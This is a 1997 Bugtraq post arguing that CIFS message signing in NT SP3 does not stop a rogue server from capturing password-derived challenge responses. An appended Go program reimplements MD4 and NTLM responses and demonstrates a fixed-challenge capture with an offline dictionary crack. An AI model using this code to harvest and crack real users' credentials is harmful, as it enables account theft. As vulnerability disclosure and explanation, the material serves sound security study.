[4490] in bugtraq


Re: CIFS Changes

daemon@ATHENA.MIT.EDU (Aaron Spangler)
Fri May 16 18:35:34 1997

Date: 	Fri, 16 May 1997 14:57:35 PDT
Reply-To: Aaron Spangler <pokee@MAXWELL.EE.WASHINGTON.EDU>
From: Aaron Spangler <pokee@MAXWELL.EE.WASHINGTON.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <199704212304.QAA05494@compton.ee.washington.edu>; from "Aaron Spangler" at Apr 21, 97 4:04 pm

A lot of people have been asking me about whether the new CIFS implementation
in SP3 is vulnerable.  Number one, it is not enabled by default, but even
if it were, I suspect it is just as vulnerable EVEN IF THERE IS MESSAGE
SIGNING!

I have not yet had time to test it, but here are the MS whitepapers on the
new protocol.

It does not make a difference whether signing is enabled or disabled.
Signing does not come into play until AFTER the password has been exchanged.
So the user's password can still be grabbed using a Web Site.

> Excerpts taken from "CIFS-Auth" dated Mar 28 Draft 4 section 1.4
> from Microsoft's FTP site.
>
> 1.4 Session authentication protocol
>
> 1. The client computes the session keys from the user's password,
> initializes its sequence number, and sends a session negotiation request
> to the server.
>
> C:        Ks  = MD4(P(U))
>           Ka = [Ks]<7>
>           Kb = [Ks]<7:7>
>           Kc = [Ks]<2:14>, Z(5)

Above just means the client has a Hashed NT Password.  Usually stored in the
SAM database in the registry.

>
> C->S:     Mneg
>
> 2. The server responds with the features negotiated, and a challenge:
>

The server sets CS=Z(8)      (the challenge is fixed to 8 bytes of zeros)
The server could even select the most secure protocols:
        NEGOTIATE_SECURITY_USER_LEVEL         ||   (not share level)
        NEGOTIATE_SECURITY_CHALLENGE_RESPONSE ||   (no plaintext passwords)
        NEGOTIATE_SECURITY_SIGNATURES_ENABLED ||   (will do the MAC thing)
        NEGOTIATE_SECURITY_SIGNATURES_REQUIRED     (insist on MAC thing)
and send them off as options in Mnegr to the client.

> S->C:     Mnegr, CS
>
> 3. The client computes a response to the challenge. It computes the MAC
> key, and the MAC of the message, and  send the user name, challenge
> response, and session request parameters to the server.  Its message
> uses a sequence number of 0, and it expects a sequence number of 1 to be
> used in the response.
>
> C:        R = {CS}Ka, {CS}Kb, {CS}Kc
>           Km = Ks, R
>           SN = 0
>           MC = [MD5(Km, SN, Msess, U, R)]<8>
>           SN = 1
>
> C->S:     Msess, U, R, MC

Notice that the client gives R to the server; R is the same thing I have been
collecting on my web page.  Easy enough to crack.

--
Aaron Spangler                 EE Unix System Administrator
Electrical Engineering FT-10        pokee@ee.washington.edu
University of Washington            Phone    (206) 543-8984
Box 352500                             or    (206) 543-2523
Seattle, WA 98195-2500              Fax      (206) 543-3842
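
The exchange the quoted excerpts describe, as an added example that is not part of the original post or of Microsoft's draft: a Go program that plays both sides of steps 1 to 3 with the rogue server choosing CS = Z(8), then runs the offline dictionary attack the post calls "easy enough". MD4 is written out because Go's standard library lacks it; DES and MD5 come from the standard library. The password "password", the user name, the dictionary, and the byte layout fed into the MD5 for MC are constructed assumptions, and the draft's wire encoding of Mneg, Mnegr and Msess is not reproduced.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/md5"
	"encoding/binary"
	"fmt"
	"unicode/utf16"
)

// md4 is a stand-alone MD4 (RFC 1320); Go's standard library does not ship one.
func md4(data []byte) [16]byte {
	k := []uint32{0, 0x5a827999, 0x6ed9eba1} // per-round additive constants
	idx := [3][16]int{{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15},
		{0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15}, {0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15}}
	sh := [3][4]uint{{3, 7, 11, 19}, {3, 5, 9, 13}, {3, 9, 11, 15}} // rotation amounts
	h := [4]uint32{0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476}
	// Padding: 0x80, zeros up to 56 mod 64, then the bit length as a little-endian uint64.
	msg := append(append([]byte{}, data...), make([]byte, 64-(len(data)+8)%64+8)...)
	msg[len(data)] = 0x80
	binary.LittleEndian.PutUint64(msg[len(msg)-8:], uint64(len(data))*8)
	for off := 0; off < len(msg); off += 64 {
		var x [16]uint32
		for i := range x {
			x[i] = binary.LittleEndian.Uint32(msg[off+4*i:])
		}
		a, b, c, d := h[0], h[1], h[2], h[3]
		for rd := 0; rd < 3; rd++ {
			for i := 0; i < 16; i++ {
				f := []uint32{b&c | ^b&d, b&c | b&d | c&d, b ^ c ^ d}[rd] // F, G, H
				t, s := a+f+x[idx[rd][i]]+k[rd], sh[rd][i%4]
				a, b, c, d = d, t<<s|t>>(32-s), b, c
			}
		}
		h[0], h[1], h[2], h[3] = h[0]+a, h[1]+b, h[2]+c, h[3]+d
	}
	var out [16]byte
	for i, v := range h {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// ntHash is step 1's Ks = MD4(P(U)): MD4 over the password encoded as UTF-16LE.
func ntHash(password string) [16]byte {
	var buf []byte
	for _, u := range utf16.Encode([]rune(password)) {
		buf = append(buf, byte(u), byte(u>>8))
	}
	return md4(buf)
}

// ntResponse is step 3's R = {CS}Ka, {CS}Kb, {CS}Kc: three 7-byte DES keys cut from Ks (the last
// padded with Z(5)), each spread to the 8-byte form crypto/des expects and used to encrypt CS.
func ntResponse(ks [16]byte, cs [8]byte) [24]byte {
	key21 := append(ks[:], 0, 0, 0, 0, 0) // Ka || Kb || Kc
	var r [24]byte
	for i := 0; i < 3; i++ {
		bits := binary.BigEndian.Uint64(append([]byte{0}, key21[7*i:7*i+7]...)) // 56 key bits
		k8 := make([]byte, 8)
		for j := range k8 { // 7 key bits per byte; the parity bit is left clear (DES ignores it)
			k8[j] = byte(bits>>(49-7*uint(j))) << 1
		}
		blk, _ := des.NewCipher(k8) // an 8-byte key never errors
		blk.Encrypt(r[8*i:8*i+8], cs[:])
	}
	return r
}

// sessionMAC is MC = [MD5(Km, SN, Msess, U, R)]<8> with Km = Ks, R. The excerpt does not give the
// serialisation of the fields, so plain concatenation with a little-endian SN is an assumption.
func sessionMAC(ks [16]byte, r [24]byte, sn uint32, msess, user string) []byte {
	var snb [4]byte
	binary.LittleEndian.PutUint32(snb[:], sn)
	sum := md5.Sum(bytes.Join([][]byte{ks[:], r[:], snb[:], []byte(msess), []byte(user), r[:]}, nil))
	return sum[:8]
}

// crackResponse is the rogue server's offline step: it chose CS and captured R in the clear, so
// each candidate password yields exactly one candidate R to compare, signing or no signing.
func crackResponse(r [24]byte, cs [8]byte, dict []string) (string, bool) {
	for _, p := range dict {
		if ntResponse(ntHash(p), cs) == r {
			return p, true
		}
	}
	return "", false
}

func main() {
	var cs [8]byte           // rogue server: CS = Z(8) as in the post (any remembered value works)
	ks := ntHash("password") // victim's client, step 1: Ks = MD4(P(U)); constructed demo password
	r := ntResponse(ks, cs)  // step 3: R and U go to the server, MC alongside them
	mc := sessionMAC(ks, r, 0, "Msess", "victim")
	fmt.Printf("rogue server saw U=victim R=%x MC=%x\n", r, mc)
	if p, ok := crackResponse(r, cs, []string{"letmein", "Password1", "password"}); ok {
		fmt.Printf("cracked: %q (NT hash %x); MC recomputable by attacker: %v\n", p, ntHash(p),
			bytes.Equal(mc, sessionMAC(ntHash(p), r, 0, "Msess", "victim")))
	}
}
```

Run it with `go run`. The thing to watch is the last line of output: MC is keyed by Km = Ks, R, both of which the attacker holds once R is cracked, so a server the attacker runs loses nothing by negotiating SIGNATURES_REQUIRED; the password material has already left the client before the first MAC is checked.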
